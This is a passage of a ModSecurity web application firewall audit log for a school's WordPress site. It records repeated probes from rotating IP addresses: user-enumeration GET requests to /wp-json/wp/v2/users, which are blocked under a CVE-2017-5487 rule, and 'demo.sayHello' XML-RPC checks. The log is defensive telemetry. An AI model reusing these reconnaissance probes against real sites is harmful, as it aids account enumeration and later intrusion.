"/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747433331932924 3331 (- - -) Stopwatch2: 1747433331932924 3331; combined=1497, p1=512, p2=954, p3=0, p4=0, p5=31, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62a2d17e-Z-- --eccc9d30-A-- [17/May/2025:05:08:58 +0700] aCe3ehKi5m5upc8uMd6eRQAAAMs 103.236.140.4 56440 103.236.140.4 8181 --eccc9d30-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.220 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.220 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --eccc9d30-C-- demo.sayHello --eccc9d30-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --eccc9d30-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747433338503678 6042 (- - -) Stopwatch2: 1747433338503678 6042; combined=4378, p1=597, p2=3533, p3=35, p4=46, p5=98, sr=118, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eccc9d30-Z-- --35066a76-A-- [17/May/2025:05:10:06 +0700] aCe3vhKi5m5upc8uMd6eSAAAANA 103.236.140.4 56446 103.236.140.4 8181 --35066a76-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --35066a76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --35066a76-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747433406839364 3193 (- - -) Stopwatch2: 1747433406839364 3193; combined=1329, p1=428, p2=871, p3=0, p4=0, p5=29, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --35066a76-Z-- --1ad36606-A-- [17/May/2025:05:10:13 +0700] aCe3xem4kjNN-hEbWjI8dAAAAFU 103.236.140.4 56450 103.236.140.4 8181 --1ad36606-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.97 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1ad36606-C-- demo.sayHello --1ad36606-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ad36606-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747433413461099 5854 (- - -) Stopwatch2: 1747433413461099 5854; combined=4378, p1=593, p2=3554, p3=30, p4=35, p5=97, sr=135, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ad36606-Z-- --a18d576d-A-- [17/May/2025:05:10:14 +0700] aCe3xum4kjNN-hEbWjI8dQAAAFY 103.236.140.4 56452 103.236.140.4 8181 --a18d576d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.131 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.131 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a18d576d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a18d576d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747433414779812 2296 (- - -) Stopwatch2: 1747433414779812 2296; combined=1141, p1=380, p2=735, p3=0, p4=0, p5=26, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a18d576d-Z-- --291f320f-A-- [17/May/2025:05:10:21 +0700] aCe3zRKi5m5upc8uMd6eTAAAANU 103.236.140.4 56458 103.236.140.4 8181 --291f320f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.131 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.131 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --291f320f-C-- demo.sayHello --291f320f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --291f320f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747433421130510 5632 (- - -) Stopwatch2: 1747433421130510 5632; combined=4164, p1=521, p2=3424, p3=31, p4=34, p5=92, sr=76, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --291f320f-Z-- --daed6063-A-- [17/May/2025:05:11:20 +0700] aCe4CBKi5m5upc8uMd6eUgAAAMM 103.236.140.4 56474 103.236.140.4 8181 --daed6063-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.11 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --daed6063-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --daed6063-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747433480779349 2595 (- - -) Stopwatch2: 1747433480779349 2595; combined=1054, p1=344, p2=689, p3=0, p4=0, p5=21, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --daed6063-Z-- --758eb04d-A-- [17/May/2025:05:11:28 +0700] aCe4EBKi5m5upc8uMd6eUwAAAMg 103.236.140.4 56478 103.236.140.4 8181 --758eb04d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.11 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --758eb04d-C-- demo.sayHello --758eb04d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --758eb04d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747433488576223 4717 (- - -) Stopwatch2: 1747433488576223 4717; combined=3607, p1=385, p2=3001, p3=33, p4=34, p5=91, sr=61, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --758eb04d-Z-- --eeb8d469-A-- [17/May/2025:05:12:44 +0700] aCe4XATOsBn9MSWb6WJqHgAAAJA 103.236.140.4 56486 103.236.140.4 8181 --eeb8d469-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.117.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.117.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --eeb8d469-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eeb8d469-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747433564654748 2783 (- - -) Stopwatch2: 1747433564654748 2783; combined=1235, p1=436, p2=762, p3=0, p4=0, p5=37, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eeb8d469-Z-- --29214609-A-- [17/May/2025:05:12:51 +0700] aCe4YwTOsBn9MSWb6WJqIAAAAJI 103.236.140.4 56490 103.236.140.4 8181 --29214609-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.117.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.117.2 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --29214609-C-- demo.sayHello --29214609-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --29214609-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747433571928090 4878 (- - -) Stopwatch2: 1747433571928090 4878; combined=3786, p1=461, p2=3125, p3=25, p4=26, p5=88, sr=68, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29214609-Z-- --7eef047c-A-- [17/May/2025:05:24:59 +0700] aCe7O3yxdQCiyU1ENFciXgAAAAY 103.236.140.4 56550 103.236.140.4 8181 --7eef047c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.184.251 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.184.251 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7eef047c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7eef047c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747434299805638 3420 (- - -) Stopwatch2: 1747434299805638 3420; combined=1446, p1=476, p2=939, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7eef047c-Z-- --31aebd6f-A-- [17/May/2025:05:25:07 +0700] aCe7Q3yxdQCiyU1ENFciYAAAAAk 103.236.140.4 56554 103.236.140.4 8181 --31aebd6f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.184.251 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.184.251 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --31aebd6f-C-- demo.sayHello --31aebd6f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --31aebd6f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747434307973515 6708 (- - -) Stopwatch2: 1747434307973515 6708; combined=4865, p1=591, p2=4025, p3=42, p4=43, p5=98, sr=81, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31aebd6f-Z-- --082dcf42-A-- [17/May/2025:05:25:29 +0700] aCe7WQTOsBn9MSWb6WJqJgAAAIY 103.236.140.4 56558 103.236.140.4 8181 --082dcf42-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.113 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.113 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --082dcf42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --082dcf42-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747434329210236 2811 (- - -) Stopwatch2: 1747434329210236 2811; combined=1233, p1=422, p2=782, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --082dcf42-Z-- --06d0173d-A-- [17/May/2025:05:25:33 +0700] aCe7XXyxdQCiyU1ENFciYgAAAAw 103.236.140.4 56562 103.236.140.4 8181 --06d0173d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.113 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.113 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --06d0173d-C-- demo.sayHello --06d0173d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --06d0173d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747434333859106 5071 (- - -) Stopwatch2: 1747434333859106 5071; combined=3859, p1=499, p2=3159, p3=26, p4=25, p5=89, sr=71, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --06d0173d-Z-- --3a8c514e-A-- [17/May/2025:05:30:41 +0700] aCe8kXyxdQCiyU1ENFcjoAAAABU 103.236.140.4 33918 103.236.140.4 8181 --3a8c514e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.156 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.156 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3a8c514e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a8c514e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747434641792136 2908 (- - -) Stopwatch2: 1747434641792136 2908; combined=1292, p1=424, p2=833, p3=0, p4=0, p5=35, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a8c514e-Z-- --c9be7c38-A-- [17/May/2025:05:30:46 +0700] aCe8lnyxdQCiyU1ENFcjsgAAAAY 103.236.140.4 34054 103.236.140.4 8181 --c9be7c38-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.156 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.156 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c9be7c38-C-- demo.sayHello --c9be7c38-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9be7c38-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747434646066848 6642 (- - -) Stopwatch2: 1747434646066848 6642; combined=4818, p1=667, p2=3900, p3=38, p4=43, p5=101, sr=141, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9be7c38-Z-- --493a3e72-A-- [17/May/2025:05:30:59 +0700] aCe8o3yxdQCiyU1ENFcj2QAAAAg 103.236.140.4 34454 103.236.140.4 8181 --493a3e72-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.127 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.127 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --493a3e72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --493a3e72-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747434659204530 2692 (- - -) Stopwatch2: 1747434659204530 2692; combined=1357, p1=432, p2=894, p3=0, p4=0, p5=31, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --493a3e72-Z-- --bcc15501-A-- [17/May/2025:05:31:06 +0700] aCe8qhKi5m5upc8uMd6fxQAAAM8 103.236.140.4 34670 103.236.140.4 8181 --bcc15501-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.127 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.127 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bcc15501-C-- demo.sayHello --bcc15501-F-- HTTP/1.1 301 Moved Permanently 